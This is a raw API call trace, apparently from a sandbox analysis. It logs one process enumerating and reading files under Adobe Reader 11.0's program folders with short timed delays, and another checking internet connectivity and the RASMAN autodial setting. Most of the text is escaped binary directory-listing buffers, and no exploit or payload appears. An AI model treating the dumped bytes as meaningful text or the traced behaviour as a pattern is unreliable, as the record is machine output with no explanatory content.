FileName => FileHandle => 0x000001ac FileInformation => h\x00\x00\x00\x00\x00\x00\x00@r\x0b\xba\xe6\x91\xcf\x01`)\x06\xd9\xe6\x91\xcf\x01`)\x06\xd9\xe6\x91\xcf\x01`)\x06\xd9\xe6\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00c\x00r\x00o\x00p\x00\x00\x00\x00\x00\x00\x00\x00F9:\xc4j\xcf\x01\xe0\xb0\x7f\xd8\xe6\x91\xcf\x01\x00F9:\xc4j\xcf\x01\xe0\xb0\x7f\xd8\xe6\x91\xcf\x01h\xa3\x07\x00\x00\x00\x00\x00\x00\xb0\x07\x00\x00\x00\x00\x00 \x00\x00\x00\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x002\x00d\x00.\x00x\x003\x00d\x00i\x00b\x00i\x00p\x00\x00\x00\x00\x00\x00\x00\x00\xa0\x9b<\xc4j\xcf\x01 !a\xd8\xe6\x91\xcf\x01\x00\xa0\x9b<\xc4j\xcf\x01 !a\xd8\xe6\x91\xcf\x01 |
SUCCESS | 0x00000000 | |
| 07:45:00,411 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:45:00,491 | 504 | FindFirstFileExW |
FileName => C:\Program Files\Adobe\Reader 11.0\Reader\plug_ins3d\prc\*.* |
SUCCESS | 0x0016c1a8 | |
| 07:45:00,491 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000198 FileInformation => h\x00\x00\x00\x00\x00\x00\x00p\xf9\x0c\xba\xe6\x91\xcf\x01p\xf9\x0c\xba\xe6\x91\xcf\x01p\xf9\x0c\xba\xe6\x91\xcf\x01p\xf9\x0c\xba\xe6\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00i\x00m\x00e\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xec\xab\xaf0\x9a\xcd\x01\xa0\x80\x0e\xba\xe6\x91\xcf\x01\x00\xec\xab\xaf0\x9a\xcd\x01\xa0\x80\x0e\xba\xe6\x91\xcf\x01\xc41\x01\x00\x00\x00\x00\x00\x00@\x01\x00\x00\x00\x00\x00 \x00\x00\x00\x1a\x00\x00\x00\x00\x00\x00\x00\x18\x00M\x00Y\x00R\x00I\x00A\x00D\x00~\x001\x00.\x00O\x00T\x00F\x00M\x00y\x00r\x00i\x00a\x00d\x00C\x00A\x00D\x00.\x00o\x00t\x00f\x00 |
SUCCESS | 0x00000000 | |
| 07:45:00,491 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000198 FileInformation => |
FAILURE | 2147483654 | |
| 07:45:00,491 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001ac FileInformation => |
FAILURE | 2147483654 | |
| 07:45:00,491 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:45:00,572 | 504 | FindFirstFileExW |
FileName => C:\Program Files\Adobe\Reader 11.0\Reader\Services\*.* |
SUCCESS | 0x0016c170 | |
| 07:45:00,572 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001ac FileInformation => h\x00\x00\x00\x00\x00\x00\x00\xa0\xed=\xc9\xe6\x91\xcf\x01\xc03\xf2\xda\xe6\x91\xcf\x01\xc03\xf2\xda\xe6\x91\xcf\x01\xc03\xf2\xda\xe6\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00c\x00r\x00o\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\x19\x089\xc4j\xcf\x010\xd2\x8b\xda\xe6\x91\xcf\x01\x00\x19\x089\xc4j\xcf\x010\xd2\x8b\xda\xe6\x91\xcf\x01\x99K\x11\x00\x00\x00\x00\x00\x00P\x11\x00\x00\x00\x00\x00 \x00\x00\x00\x1e\x00\x00\x00\x00\x00\x00\x00\x18\x00D\x00E\x00X\x00E\x00C\x00H\x00~\x001\x00.\x00S\x00P\x00I\x00D\x00E\x00X\x00E\x00c\x00h\x00o\x00S\x00i\x00g\x00n\x00.\x00s\x00p\x00i\x00\xc4j\xcf\x01x\x00\x00\x00\x00\x00\x00\x00\x00T`A\xc4j\xcf\x01 B\xf5\xda\xe6\x91\xcf\x01 |
SUCCESS | 0x00000000 | |
| 07:45:00,572 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001ac FileInformation => |
FAILURE | 2147483654 | |
| 07:45:00,572 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:45:00,662 | 504 | FindFirstFileExW |
FileName => C:\Program Files\Adobe\Reader 11.0\Reader\Tracker\*.* |
SUCCESS | 0x0016c170 | |
| 07:45:00,682 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001ac FileInformation => h\x00\x00\x00\x00\x00\x00\x00@ f\xc1\xe6\x91\xcf\x01\xb0\xe6y\xc1\xe6\x91\xcf\x01\xb0\xe6y\xc1\xe6\x91\xcf\x01\xb0\xe6y\xc1\xe6\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00c\x00r\x00o\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\xec\xab\xaf0\x9a\xcd\x010\xadm\xc1\xe6\x91\xcf\x01\x00\xec\xab\xaf0\x9a\xcd\x010\xadm\xc1\xe6\x91\xcf\x01:\x05\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00 \x00\x00\x00 \x00\x00\x00\x00\x00\x00\x00\x18\x00A\x00D\x00D\x00_\x00R\x00E\x00~\x001\x00.\x00G\x00I\x00F\x00a\x00d\x00d\x00_\x00r\x00e\x00v\x00i\x00e\x00w\x00e\x00r\x00.\x00g\x00i\x00f\x00\xcf\x01p\x00\x00\x00\x00\x00\x00\x00\x00\xec\xab\xaf0\x9a\xcd\x01\x00&l\xc1\xe6\x91\xcf\x01 |
SUCCESS | 0x00000000 | |
| 07:45:00,682 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001ac FileInformation => p\x00\x00\x00\x00\x00\x00\x00\x00F\x0e\xb20\x9a\xcd\x01\xc0Br\xc1\xe6\x91\xcf\x01\x00F\x0e\xb20\x9a\xcd\x01\xc0Br\xc1\xe6\x91\xcf\x01U\x00\x00\x00\x00\x00\x00\x00X\x00\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00t\x00l\x00.\x00g\x00i\x00f\x00\x00\x00\x00\x00\x00\x00p\x00\x00\x00\x00\x00\x00\x00\x00\x19\xdd\xb00\x9a\xcd\x01\xc0Br\xc1\xe6\x91\xcf\x01\x00\x19\xdd\xb00\x9a\xcd\x01\xc0Br\xc1\xe6\x91\xcf\x01U\x00\x00\x00\x00\x00\x00\x00X\x00\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x0c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00t\x00r\x00.\x00g\x00i\x00f\x00e\x00r\x00.\x00p\x00\x00\x00\x00\x00\x00\x00\x00\xec\xab\xaf0\x9a\xcd\x01`4o\xc1\xe6\x91\xcf\x01\x00\xec\xab\xaf0\x9a\xcd\x01 |
SUCCESS | 0x00000000 | |
| 07:45:00,692 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001ac FileInformation => |
FAILURE | 2147483654 | |
| 07:45:00,692 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x0000018c FileInformation => |
FAILURE | 2147483654 | |
| 07:45:00,692 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Program Files\Adobe\Reader 11.0\ReadMe.htm DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x0000018c |
SUCCESS | 0x00000000 | |
| 07:45:00,722 | 504 | NtReadFile |
Buffer => <html xmlns:v="urn:schemas-microsoft-com:vml"
xmlns:o="urn:schemas-microsoft-com:office:office"
xmlns:w="urn:schemas-microsoft-com:office:word"
xmlns:st1="urn:schemas-microsoft-com:office:smarttags"
xmlns="http://www.w3.org/TR/REC-html40">
<head>
< FileHandle => 0x0000018c |
SUCCESS | 0x00000000 | |
| 07:45:00,812 | 504 | NtReadFile |
Buffer => FileHandle => 0x0000018c |
FAILURE | 3221225489 | |
| 07:45:00,812 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:45:00,892 | 504 | FindFirstFileExW |
FileName => C:\Program Files\Adobe\Reader 11.0\Resource\*.* |
SUCCESS | 0x0016c138 | |
| 07:45:00,892 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x0000018c FileInformation => h\x00\x00\x00\x00\x00\x00\x00`@\xb4\xbb\xe6\x91\xcf\x01P?J\xc7\xe6\x91\xcf\x01P?J\xc7\xe6\x91\xcf\x01P?J\xc7\xe6\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00y\x00p\x00t\x00h\x00\x00\x00\x00\x00\x00\x00\x90\xc7\xb5\xbb\xe6\x91\xcf\x01\xf0\xc6\xab\xed\xe6\x91\xcf\x01\xf0\xd5\xb8\xbb\xe6\x91\xcf\x01\xf0\xd5\xb8\xbb\xe6\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00C\x00M\x00a\x00p\x00\x00\x00x\x00\x00\x00\x00\x00\x00\x00\x00F\x0e\xb20\x9a\xcd\x01\xc0%\xf5\xbc\xe6\x91\xcf\x01\x00F\x0e\xb20\x9a\xcd\x01\xc0%\xf5\xbc\xe6\x91\xcf\x01\x9e\x1d\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | |
| 07:45:00,892 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:45:00,982 | 504 | FindFirstFileExW |
FileName => C:\Program Files\Adobe\Reader 11.0\Resource\CMap\*.* |
SUCCESS | 0x0016c170 | |
| 07:45:00,982 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001ac FileInformation => h\x00\x00\x00\x00\x00\x00\x00\x90\xc7\xb5\xbb\xe6\x91\xcf\x01\xf0\xc6\xab\xed\xe6\x91\xcf\x01\xf0\xd5\xb8\xbb\xe6\x91\xcf\x01\xf0\xd5\xb8\xbb\xe6\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00.\x00g\x00i\x00x\x00\x00\x00\x00\x00\x00\x00\x00\xec\xab\xaf0\x9a\xcd\x01\xc0N\xb7\xbb\xe6\x91\xcf\x01\x00\xec\xab\xaf0\x9a\xcd\x01\xf0\xc6\xab\xed\xe6\x91\xcf\x01$ \x00\x00\x00\x00\x00\x00\x000\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x14\x00\x00\x00\x00\x00\x00\x00\x10\x00I\x00D\x00E\x00N\x00T\x00I\x00~\x001\x00\x00\x00\x00\x00\x00\x00\x00\x00I\x00d\x00e\x00n\x00t\x00i\x00t\x00y\x00-\x00H\x00e\x00r\x00.\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xec\xab\xaf0\x9a\xcd\x01\xf0\xd5\xb8\xbb\xe6\x91\xcf\x01\x00\xec\xab\xaf0\x9a\xcd\x01 |
SUCCESS | 0x00000000 | |
| 07:45:00,982 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Program Files\Adobe\Reader 11.0\Resource\CMap\Identity-H DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x00000198 |
SUCCESS | 0x00000000 | |
| 07:45:01,002 | 504 | NtReadFile |
Buffer => %!PS-Adobe-3.0 Resource-CMap
%%DocumentNeededResources: ProcSet (CIDInit)
%%IncludeResource: ProcSet (CIDInit)
%%BeginResource: CMap (Identity-H)
%%Title: (Identity-H Adobe Identity 0)
%%Version: 10.001
%%Copyright: ---------------------------------- FileHandle => 0x00000198 |
SUCCESS | 0x00000000 | |
| 07:45:01,042 | 504 | NtReadFile |
Buffer => FileHandle => 0x00000198 |
FAILURE | 3221225489 | |
| 07:45:01,052 | 504 | NtCreateFile |
ShareAccess => 3 FileName => C:\Program Files\Adobe\Reader 11.0\Resource\CMap\Identity-V DesiredAccess => 0x80100080 CreateDisposition => 1 FileHandle => 0x00000198 |
SUCCESS | 0x00000000 | |
| 07:45:01,062 | 504 | NtReadFile |
Buffer => %!PS-Adobe-3.0 Resource-CMap
%%DocumentNeededResources: ProcSet (CIDInit)
%%IncludeResource: ProcSet (CIDInit)
%%BeginResource: CMap (Identity-V)
%%Title: (Identity-V Adobe Identity 0)
%%Version: 10.001
%%Copyright: ---------------------------------- FileHandle => 0x00000198 |
SUCCESS | 0x00000000 | |
| 07:45:01,072 | 504 | NtReadFile |
Buffer => FileHandle => 0x00000198 |
FAILURE | 3221225489 | |
| 07:45:01,072 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001ac FileInformation => |
FAILURE | 2147483654 | |
| 07:45:01,082 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:45:01,092 | 1308 | LdrGetDllHandle |
ModuleHandle => 0x771b0000 FileName => wininet.dll |
SUCCESS | 0x00000000 | |
| 07:45:01,092 | 1308 | LdrGetProcedureAddress |
Ordinal => 0 FunctionName => InternetGetConnectedState FunctionAddress => 0x771d5c4e ModuleHandle => 0x771b0000 |
SUCCESS | 0x00000000 | |
| 07:45:01,092 | 1308 | OpenSCManagerW |
MachineName => DatabaseName => DesiredAccess => 2147483648 |
SUCCESS | 0x0016bf70 | |
| 07:45:01,092 | 1308 | OpenServiceW |
ServiceControlManager => 0x0016bf70 ServiceName => RASMAN DesiredAccess => 4 |
SUCCESS | 0x0016cdd8 | |
| 07:45:01,092 | 1308 | RegQueryValueExA |
Handle => 0x000000b8 DataLength => 4 ValueName => EnableAutodial Type => 184 |
FAILURE | 0x00000002 | |
| 07:45:01,092 | 1308 | NtQueryInformationFile |
FileHandle => 0x000000c0 FileInformation => \x00\xc0\x03\x00\x00\x00\x00\x00\x00\xc0\x03\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | 1 time |
| 07:45:01,102 | 1308 | NtDelayExecution |
Milliseconds => 800 |
SUCCESS | 0x00000000 | |
| 07:45:01,162 | 504 | FindFirstFileExW |
FileName => C:\Program Files\Adobe\Reader 11.0\Resource\Font\*.* |
SUCCESS | 0x0016c170 | |
| 07:45:01,162 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000198 FileInformation => h\x00\x00\x00\x00\x00\x00\x00\xf0\xd5\xb8\xbb\xe6\x91\xcf\x01\x80\x93\x89\xd9\xe6\x91\xcf\x01\x80\x93\x89\xd9\xe6\x91\xcf\x01\x80\x93\x89\xd9\xe6\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00.\x00g\x00i\x00\x80\x00\x00\x00\x00\x00\x00\x00\x00\xec\xab\xaf0\x9a\xcd\x01\xa0\x96\xc6\xbb\xe6\x91\xcf\x01\x00\xec\xab\xaf0\x9a\xcd\x01\xa0\x96\xc6\xbb\xe6\x91\xcf\x01\xaci\x01\x00\x00\x00\x00\x00\x00p\x01\x00\x00\x00\x00\x00 \x00\x00\x00\x1c\x00\x00\x00\x00\x00\x00\x00\x18\x00A\x00D\x00O\x00B\x00E\x00P\x00~\x001\x00.\x00O\x00T\x00F\x00A\x00d\x00o\x00b\x00e\x00P\x00i\x00S\x00t\x00d\x00.\x00o\x00t\x00f\x00\x00\x00\x00\x00\x00\x00\x88\x00\x00\x00\x00\x00\x00\x00\x00\x19\xdd\xb00\x9a\xcd\x01@\xfb\xdb\xbb\xe6\x91\xcf\x01 |
SUCCESS | 0x00000000 | |
| 07:45:01,162 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:45:01,393 | 504 | FindFirstFileExW |
FileName => C:\Program Files\Adobe\Reader 11.0\Resource\Font\PFM\*.* |
SUCCESS | 0x0016c1a8 | |
| 07:45:01,393 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001ac FileInformation => h\x00\x00\x00\x00\x00\x00\x00P\xe4\xbb\xbb\xe6\x91\xcf\x01\xb0\xf2\xbe\xbb\xe6\x91\xcf\x01\xe0y\xc0\xbb\xe6\x91\xcf\x01\xe0y\xc0\xbb\xe6\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00et (CIx\x00\x00\x00\x00\x00\x00\x00\x00\x19\xdd\xb00\x9a\xcd\x01\xe0y\xc0\xbb\xe6\x91\xcf\x01\x00\x19\xdd\xb00\x9a\xcd\x01\xe0y\xc0\xbb\xe6\x91\xcf\x01\xa0\x02\x00\x00\x00\x00\x00\x00\xa0\x02\x00\x00\x00\x00\x00\x00 \x00\x00\x00\x18\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00S\x00Y\x00_\x00_\x00_\x00_\x00_\x00_\x00.\x00P\x00F\x00M\x00--x\x00\x00\x00\x00\x00\x00\x00\x00\xec\xab\xaf0\x9a\xcd\x01\xb0\xf2\xbe\xbb\xe6\x91\xcf\x01\x00\xec\xab\xaf0\x9a\xcd\x01 |
SUCCESS | 0x00000000 | |
| 07:45:01,393 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001ac FileInformation => |
FAILURE | 2147483654 | |
| 07:45:01,393 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000198 FileInformation => |
FAILURE | 2147483654 | |
| 07:45:01,393 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:45:01,473 | 504 | FindFirstFileExW |
FileName => C:\Program Files\Adobe\Reader 11.0\Resource\SaslPrep\*.* |
SUCCESS | 0x0016c170 | |
| 07:45:01,473 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000198 FileInformation => h\x00\x00\x00\x00\x00\x00\x00\xb0U{\xc3\xe6\x91\xcf\x01\xb0U{\xc3\xe6\x91\xcf\x01\xb0U{\xc3\xe6\x91\xcf\x01\xb0U{\xc3\xe6\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00.\x00g\x00i\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x19\xdd\xb00\x9a\xcd\x01\xb0U{\xc3\xe6\x91\xcf\x01\x00\x19\xdd\xb00\x9a\xcd\x01\xb0U{\xc3\xe6\x91\xcf\x01\x9c5\x00\x00\x00\x00\x00\x00\x00@\x00\x00\x00\x00\x00\x00 \x00\x00\x00:\x00\x00\x00\x00\x00\x00\x00\x18\x00S\x00A\x00S\x00L\x00P\x00R\x00~\x001\x00.\x00S\x00P\x00P\x00S\x00a\x00s\x00l\x00P\x00r\x00e\x00p\x00P\x00r\x00o\x00f\x00i\x00l\x00e\x00_\x00n\x00o\x00r\x00m\x00_\x00b\x00i\x00d\x00i\x00.\x00s\x00p\x00p\x00 |
SUCCESS | 0x00000000 | |
| 07:45:01,473 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000198 FileInformation => |
FAILURE | 2147483654 | |
| 07:45:01,473 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:45:01,553 | 504 | FindFirstFileExW |
FileName => C:\Program Files\Adobe\Reader 11.0\Resource\TypeSupport\*.* |
SUCCESS | 0x0016c170 | |
| 07:45:01,553 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x00000198 FileInformation => h\x00\x00\x00\x00\x00\x00\x00P?J\xc7\xe6\x91\xcf\x01P?J\xc7\xe6\x91\xcf\x01P?J\xc7\xe6\x91\xcf\x01P?J\xc7\xe6\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00.\x00g\x00i\x00\x00\x00\x00\x00\x00\x00\x00\x00P?J\xc7\xe6\x91\xcf\x01P?J\xc7\xe6\x91\xcf\x01P?J\xc7\xe6\x91\xcf\x01P?J\xc7\xe6\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x0e\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00U\x00n\x00i\x00c\x00o\x00d\x00e\x00 |
SUCCESS | 0x00000000 | |
| 07:45:01,553 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:45:01,633 | 504 | FindFirstFileExW |
FileName => C:\Program Files\Adobe\Reader 11.0\Resource\TypeSupport\Unicode\*.* |
SUCCESS | 0x0016c1a8 | |
| 07:45:01,633 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x000001ac FileInformation => h\x00\x00\x00\x00\x00\x00\x00P?J\xc7\xe6\x91\xcf\x01P?J\xc7\xe6\x91\xcf\x010\x87Y\xc7\xe6\x91\xcf\x010\x87Y\xc7\xe6\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x00et (CIh\x00\x00\x00\x00\x00\x00\x000\x87Y\xc7\xe6\x91\xcf\x010\x87Y\xc7\xe6\x91\xcf\x010\x87Y\xc7\xe6\x91\xcf\x010\x87Y\xc7\xe6\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00I\x00C\x00U\x00_\x00_\x00\x00\x00\x00\x00\x00\x00\x00\x00P?J\xc7\xe6\x91\xcf\x01P?J\xc7\xe6\x91\xcf\x01P?J\xc7\xe6\x91\xcf\x01P?J\xc7\xe6\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | |
| 07:45:01,633 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:45:01,713 | 504 | FindFirstFileExW |
FileName => C:\Program Files\Adobe\Reader 11.0\Resource\TypeSupport\Unicode\ICU\*.* |
SUCCESS | 0x00169d50 | |
| 07:45:01,713 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x0000019c FileInformation => h\x00\x00\x00\x00\x00\x00\x000\x87Y\xc7\xe6\x91\xcf\x010\x87Y\xc7\xe6\x91\xcf\x01`\x0e[\xc7\xe6\x91\xcf\x01`\x0e[\xc7\xe6\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x0050ff> \x00\x00\x00\x00\x00\x00\x00\x00\x00\x19\xdd\xb00\x9a\xcd\x01\x90\x95\\xc7\xe6\x91\xcf\x01\x00\x19\xdd\xb00\x9a\xcd\x01\x90\x95\\xc7\xe6\x91\xcf\x01\xf0E\x03\x00\x00\x00\x00\x00\x00P\x03\x00\x00\x00\x00\x00 \x00\x00\x00\x18\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00i\x00c\x00u\x00d\x00t\x002\x006\x00l\x00.\x00d\x00a\x00t\x00 |
SUCCESS | 0x00000000 | |
| 07:45:01,713 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x0000019c FileInformation => |
FAILURE | 2147483654 | |
| 07:45:01,713 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:45:01,793 | 504 | FindFirstFileExW |
FileName => C:\Program Files\Adobe\Reader 11.0\Resource\TypeSupport\Unicode\Mappings\*.* |
SUCCESS | 0x00169d50 | |
| 07:45:01,793 | 504 | NtQueryDirectoryFile |
FileName => FileHandle => 0x0000019c FileInformation => h\x00\x00\x00\x00\x00\x00\x00P?J\xc7\xe6\x91\xcf\x01P?J\xc7\xe6\x91\xcf\x01\xd0xV\xc7\xe6\x91\xcf\x01\xd0xV\xc7\xe6\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00.\x00.\x0050ff> h\x00\x00\x00\x00\x00\x00\x00\xd0xV\xc7\xe6\x91\xcf\x01\xd0xV\xc7\xe6\x91\xcf\x01\xd0xV\xc7\xe6\x91\xcf\x01\xd0xV\xc7\xe6\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00 \x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00A\x00d\x00o\x00b\x00e\x00h\x00\x00\x00\x00\x00\x00\x00\xa0\xf1T\xc7\xe6\x91\xcf\x01\xf0\xa3_\xc7\xe6\x91\xcf\x01\xf0\xa3_\xc7\xe6\x91\xcf\x01\xf0\xa3_\xc7\xe6\x91\xcf\x01\x00\x00\x00\x00\x00\x00\x00\x00 |
SUCCESS | 0x00000000 | |
| 07:45:01,793 | 504 | NtDelayExecution |
Milliseconds => 75 |
SUCCESS | 0x00000000 | |
| 07:45:01,873 | 504 | FindFirstFileExW |
